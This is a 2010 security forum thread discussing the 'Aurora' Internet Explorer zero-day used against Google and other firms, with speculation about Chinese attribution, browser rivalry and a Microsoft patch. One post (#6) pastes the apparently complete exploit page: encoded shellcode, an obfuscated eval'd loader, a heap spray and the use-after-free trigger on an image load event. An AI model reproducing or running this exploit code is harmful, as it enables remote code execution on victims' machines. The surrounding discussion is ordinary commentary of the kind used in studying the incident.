Mystery Exploit
Results 1 to 9 of 9

Thread: Mystery Exploit

  1. #1
    Banned
    Join Date
    Nov 2002
    Posts
    677

    Mystery Exploit

    the code planted by the attackers was also extremely sophisticated, using encryption and covert channels to hide itself, and was written from scratch, rather than cookie-cutter code pulled from other exploits
    Anyone has more information concerning a 0-day exploit codenamed "Aurora". Every article I stumpled upon went from Google being hack all the way to 34 major companies being pwned by this exploit. Some articles have you believe every version of Microsoft Internet explorer including Windows 7 version are all vulnerable and they do not know how to fix it. I read other articles saying the attacks are caused by "trojan" emails with Microcrap products. Every article I read is a summary as if they are trying to protect Microsoft or prevent Hackers from pwning the Microsoft world. How can they just single out China if they don't know what they are chasing?

    Again...does anyone have a juicy explanation of what is going on?

    Chinese cyberspies used a vulnerability that reflects state-level sophistication.
    Last edited by Linen0ise; January 15th, 2010 at 04:51 AM.

  2. #2
    Banned
    Join Date
    Nov 2002
    Posts
    677
    CNN has honored a request from the Department of Homeland Security not to divulge certain details about the experiment, dubbed "Aurora," and conducted in March at the Department of Energy's Idaho lab
    Great...your friends are not really your friends.

    http://www.cnn.com/2007/US/09/26/pow...isk/index.html

    Hackers compromised dozens of Department of Homeland Security computers, moving sensitive information to Chinese-language Web sites, congressional investigators said Monday.

    Investigators pointed a finger at a government contractor, saying the firm hired to protect DHS computers tried to hide the incidents from the department.
    Last edited by Linen0ise; January 15th, 2010 at 05:34 AM.

  3. #3
    Senior Member IKnowNot's Avatar
    Join Date
    Jan 2003
    Posts
    792
    LinenOise

    The only thing I had read on this prior to your post was at SANS:
    0-day vulnerability in Internet Explorer 6, 7 and 8

    But I am curious: how did you connect this latest incident
    McAfee has named Aurora ( see Operation "Aurora" Hit Google, Others )
    with the experimental cyber attack dubbed "Aurora," referenced in the 2007 article from your second post?

    Just because of the name,
    or there something you know that we don't?
    " And maddest of all, to see life as it is and not as it should be" --Miguel Cervantes

  4. #4
    Super Moderator: GMT Zone nihil's Avatar
    Join Date
    Jul 2003
    Location
    United Kingdom: Bridlington
    Posts
    17,178
    Hmmm,

    How can they just single out China if they don't know what they are chasing?
    You can't these days...............hell! if you were going to launch something nasty on the interwebz, I am sure you would use your IP address from your ISP in your country?

    On the other hand it might be dissidents trying to embarrass their government?

    Personally, I don't go for the China source. I have looked at their government funded and approved software and it is basically a load of crap. Mostly just other people's stuff translated into a Chinese GUI and re-badged.

    Just look at "Red Flag Linux" and Kylin Linux" as examples
    If you cannot do someone any good: don't do them any harm....
    As long as you did this to one of these, the least of my little ones............you did it unto Me.
    What profiteth a man if he gains the entire World at the expense of his immortal soul?

  5. #5
    Gonzo District BOFH westin's Avatar
    Join Date
    Jan 2006
    Location
    SW MO
    Posts
    1,188
    \"Those of us that had been up all night were in no mood for coffee and donuts, we wanted strong drink.\"

    -HST

  6. #6
    HYBR|D
    Guest
    here's the exploit in action.

    http://praetorianprefect.com/archive...oit-in-action/

    also has the vector used.

    Code:
    <html><script>var sc = unescape("
    %u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805
    %uffe2%uffff%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2
    %u3081%udb59%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0%ubdab%u8caa%u9e53%u30d4%uda37%ud8d8%u3053
    %ud9b2%u3081%udbb9%ud8d8%u213a%ub7b0%ud8b6%ub0d8%uaaad%ub5b4%u538c%ud49e%u0830%ud8da%u53d8
    %ub230%u81d9%u9a30%ud8db%u3ad8%ub021%uebb4%ud8ea%uabb0%ubdb0%u8cb4%u9e53%u30d4%uda69%ud8d8
    %u3053%ud9b2%u3081%udbfb%ud8d8%u213a%u3459%ud9d8%ud8d8%u0453%u1b59%ud858%ud8d8%ud8b2%uc2b2
    %ub28b%u27d8%u9c8e%u18eb%u5898%udbe4%uadd8%u5121%u485e%ud8d8%u1fd8%udbdc%ub984%ubdf6%u9c1f
    %udcdb%ubda0%ud8d8%u11eb%u8989%u8f8b%ueb89%u5318%u989e%u8630%ud8da%u5bd8%ud820%u5dd7%ud9a7
    %ud8d8%ud8b2%ud8b2%udbb2%ud8b2%udab2%ud8b0%ud8d8%u8b18%u9e53%u30fc%udae5%ud8d8%u205b%ud727
    %u865c%ud8d9%u51d8%ub89e%ud8b2%u2788%uf08e%u9e51%u53bc%u485e%ud8d8%u1fd8%udbdc%uba84%ubdf6
    %u9c1f%udcdb%ubda0%ud8d8%ud8b2%ud8b2%udab2%ud8b2%ud8b2%ud8b0%ud8d8%u8b98%u9e53%u30fc%ud923
    %ud8d8%u205b%ud727%uc45c%ud8d9%u51d8%u5c5e%ud8d8%u51d8%u5446%ud8d8%u53d8%ub89e%ud8b2%ud8b2
    %ud8b2%u9e53%u88b8%u8e27%u1fe0%ua89e%ud8d8%ud8d8%u9e1f%ud8ac%ud8d8%u59d8%ud81f%ud8da%uebd8
    %u5303%ubc86%ud8b2%u9e55%u88a8%ud8b0%ud8dc%u8fd8%uae27%u27b8%udc8e%u11eb%ud861%ud8dc%u58d8
    %ud7a4%u4d27%ud4ac%ua458%u27d7%uacd8%u58dd%ud7ac%u4d27%u333a%u1b53%ud8f5%ud8dc%u5bd8%ud820
    %udba7%u8651%ub2a8%u55d8%uac9e%u2788%ua8ae%u278f%u5c6e%ud8d8%u27d8%ue88e%u3359%udcd8%ud8d8
    %u235b%ua7d8%u277d%ub8ae%u8e27%u27ec%u5c6e%ud8d8%u27d8%uec8e%u5e53%ud848%ud8d8%u4653%ud854
    %ud8d8%udc1f%u84db%uf6b9%u8bbd%u8e27%u53f4%u5466%ud8d8%u53d8%u485e%ud8d8%u1fd8%udfdc%uba84
    %ubdf6%u3459%ud9d8%ud8d8%u0453%ud8b0%ud8d9%u8bd8%ud8b0%ud8d9%u8fd8%ud8b2%ud8b2%u8e27%u53c4
    %ueb23%ueb18%u5903%ud834%ud8da%u53d8%u5b14%u8c20%ud0a5%uc451%u5bd9%udc18%u2b33%u1453%u0153
    %u1b5b%uebc8%u8818%u8b89%u8888%u8888%u8888%u888f%u5388%ud09e%u2f30%ud8d8%u53d8%ue4a6%uec30
    %ud8d9%u30d8%ud8ef%ud8d8%ubbb0%uafae%ub0d8%ub0ab%ub7bc%u538c%ud49e%u6e30%ud8d8%u51d8%ue49e
    %u79bc%ud8dc%ud8d8%u7855%u27b8%u2727%ubdb2%uae27%u53e4%uc89e%u4230%ud8d8%uebd8%u8b03%u8b8b
    %u278b%u3008%ud83d%ud8d8%u3459%ud9d8%ud8d8%u2453%u1f5b%u1fdc%ueadf%u49ac%u1fd4%udc9f%u51bb
    %u9709%u9f1f%u78d0%u4fbd%u1f13%ud49f%u9889%ua762%u9f1f%ue6c8%u6ec5%u1fe1%ucc9f%ub160%uc30c
    %u9f1f%u66c0%ubea7%u1f78%uc49f%u7124%u75ef%u9f1f%u40f8%uc8d2%ubc20%ue879%ud8d8%u53d8%ud498
    %ua853%u75c4%ub053%u53d0%u512f%ubc8e%udcb2%u3081%ud87b%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0
    %ubdab%u8caa%ude53%uca30%ud8d8%u53d8%ub230%u81dd%u5c30%ud8d8%u3ad8%ueb21%u8f27%u8e27%u58dc
    %u30e0%ue058%uad31%u59c9%udda0%u4848%u4848%ud0ac%u2753%u538d%u5534%udd98%u3827%ue030%ud8d8
    %u1bd8%ue058%u5830%u31e0%uc9ad%ua059%u48dd%u4848%uac48%ub03f%ud2d0%ud8d8%u9855%u27dd%u3038
    %ud8cf%ud8d8%u301b%ud8c9%ud8d8%uc960%udcd9%u1a58%ud8d4%uda33%u1b80%u2130%u2727%u8327%udf1e
    %u5160%ud987%u1fbe%udd9f%u3827%u8b1b%u0453%ub28b%ub098%uc8d8%ud8d8%u538f%uf89e%u5e30%u2727
    %u8027%u891b%u538e%ue4ad%uac53%ua0f6%u2ddb%u538e%uf8ae%u2ddb%u11eb%u9991%udb75%ueb1d%ud703
    %uc866%u0ee2%ud0ac%u1319%udbdf%u9802%u2933%uc7e3%u3fad%u5386%ufc86%u05db%u53be%u93d4%u8653
    %udbc4%u5305%u53dc%u1ddb%u8673%u1b81%uc230%u2724%u6a27%u3a2a%u6a2c%ud7ee%u28cb%ua390%ueae5
    %u49ac%u5dd4%u7707%ubb63%u0951%u8997%u6298%udfa7%ufa4a%uc6a8%ubc7c%u4b37%u3cea%u564c%ud2cb
    %ua174%u3ee1%u1c40%uc755%u8fac%ud5be%u9b27%u7466%u4003%uc8d2%u5820%u770e%u2342%ucd8b%ub0be
    %uacac%ue2a8%uf7f7%ubdbc%ub7b5%uf6e9%uacbe%ub9a8%ubbbb%uabbd%uf6ab%ubbbb%ubcf7%ub5bd%uf7b7
    %ubcb9%ub2f6%ubfa8%u00d8");
    var sss = Array(826, 679, 798, 224, 770, 427, 819, 770, 707, 805, 693, 679, 784, 707, 280, 
    238, 259, 819, 336, 693, 336, 700, 259, 819, 336, 693, 336, 700, 238, 287, 413, 224, 833, 
    728, 735, 756, 707, 280, 770, 322, 756, 707, 770, 721, 812, 728, 420, 427, 371, 350, 364, 
    350, 392, 392, 287, 224, 770, 301, 427, 770, 413, 224, 770, 427, 770, 322, 805, 819, 686, 
    805, 812, 798, 735, 770, 721, 280, 336, 448, 371, 350, 364, 350, 378, 399, 315, 805, 693, 
    322, 756, 707, 770, 721, 812, 728, 287, 413, 826, 679, 798, 224, 840, 427, 770, 707, 833, 
    224, 455, 798, 798, 679, 847, 280, 287, 413, 224, 714, 777, 798, 280, 826, 679, 798, 224, 
    735, 427, 336, 413, 735, 420, 350, 336, 336, 413, 735, 301, 301, 287, 224, 861, 840, 637, 
    735, 651, 427, 770, 301, 805, 693, 413, 875);
    var arr = new Array;
    for (var i = 0; i < sss.length; i ++ ){
      arr[i] = String.fromCharCode(sss[i]/7); } var cc=arr.toString();cc=cc.replace(/ ,/ g, ""
      );
      cc = cc.replace(/@/g, ",");
      eval(cc);
      var x1 = new Array();
      for (i = 0; i < 200; i ++ ){
        x1[i] = document.createElement("COMMENT");
        x1[i].data = "abc";
      }
      ;
      var e1 = null;
      function ev1(evt){
        e1 = document.createEventObject(evt);
        document.getElementById("sp1").innerHTML = "";
        window.setInterval(ev2, 50);
      }
      function ev2(){
        p = "
    \u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d
    \u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d
    \u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d";
        for (i = 0; i < x1.length; i ++ ){
          x1[i].data = p;
        }
        ;
        var t = e1.srcElement;
      }
    </script><span id="sp1"><IMG SRC="aaa.gif" onload="ev1(event)"></span></body></html>

  7. #7
    Banned
    Join Date
    Nov 2002
    Posts
    677
    "In a specially-crafted attack, in attempting to access a freed object, Internet Explorer can be caused to allow remote code execution."

    I can picture this in a programming standpoint. Every object referenced kept a copy of a pointer and assumed legit is legit. Cloned object using the same memory space accepted the arguments but the code inside did it's own thing. logic bomb? Sorta like the old .dll Microsoft attacks.

    I did come across a vulnerability that probably was not addressed. It attacked the logic code within compilers. Sure the source code looked error free and nice but when the attacker sent the compiler optimization codes....enabled the logic bomb. That was for linux last time I checked. I believe cause a race condition or kernel panic. Microsoft copies from everyone else? Heck...Microsoft lost the browser war some time ago didn't they? Copied and went mainstream with the others. Are the Others compromised? I never could understand the kernel upgrades for linux but I do worship them. Those are the real programmers, IMO.
    Last edited by Linen0ise; January 16th, 2010 at 06:11 AM.

  8. #8
    Banned
    Join Date
    Jan 2008
    Posts
    605
    Actually back in the day, IE innovated alot of concepts when most browsers waited an entire decade for web stadards to adapt to modern technology. More like, all these browsers want to emulate and take something from Opera!

    And FAILfox will never be Opera. And its no longer falsely advertised as a "security product" because a month after it released they rivaled the amount of vulnerabilities as... a browser thats been around since 1995.

  9. #9
    Banned
    Join Date
    Nov 2002
    Posts
    677
    Well if anyone is interested, Microsoft was kind enough to release a patch for Internet Explorer 6 right now. If you can get the patch why not just upgrade?

    Patch for IE 6 Available
    Last edited by Linen0ise; January 20th, 2010 at 09:29 PM.

Similar Threads

  1. Again.. Second 0-day exploit out...
    By dalek in forum Microsoft Security Discussions
    Replies: 7
    Last Post: September 23rd, 2006, 03:46 AM
  2. Exploit already available for Windows vulnerability
    By Black Cluster in forum Microsoft Security Discussions
    Replies: 3
    Last Post: October 14th, 2005, 08:44 AM
  3. Network Security made easy?
    By Tiger Shark in forum Microsoft Security Discussions
    Replies: 5
    Last Post: January 14th, 2005, 07:47 PM
  4. Cloaked Exploit Scanner II
    By ntsa in forum The Security Tutorials Forum
    Replies: 3
    Last Post: July 21st, 2002, 04:00 PM
  5. OE/IE6/WMP Temporary File Exploit
    By zigar in forum Microsoft Security Discussions
    Replies: 3
    Last Post: April 4th, 2002, 07:50 PM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  

 Security News

     Patches

       Security Trends

         How-To

           Buying Guides